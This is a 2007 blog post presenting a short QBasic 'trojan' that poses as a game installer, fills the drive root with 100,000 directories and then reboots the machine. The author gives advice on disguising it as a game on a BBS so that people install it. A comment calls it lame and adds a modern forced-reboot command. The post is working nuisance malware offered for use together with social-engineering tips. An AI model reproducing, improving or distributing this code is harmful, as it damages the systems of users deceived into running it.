Saturday, December 1, 2007

All about viruses n worms...

This is a little trojan written in Qbasic 4.5

REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a sh*tty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"

How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!

What does it do?
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md. To get rid of them any other way you
would have to format c: or d: (with help....)

1 comment:

Anonymous said...

This was lame...
First, you need a basic interpreter to run this.
Second, it will only create directories in the root.
Third, it is not a trojan. A Trojan, by definition, is a computer program, that ships out privet information to other ppl(The hacker in this case).
Fourth, the rebooting will work only in case of older computers. In case of newer OSes, you'd have to use:
shell "shutdown -f -t 00 -r"
see "help shutdown" for help on the parameters.

Fifth, this was definitely lame.
I'd expect better posts in the future.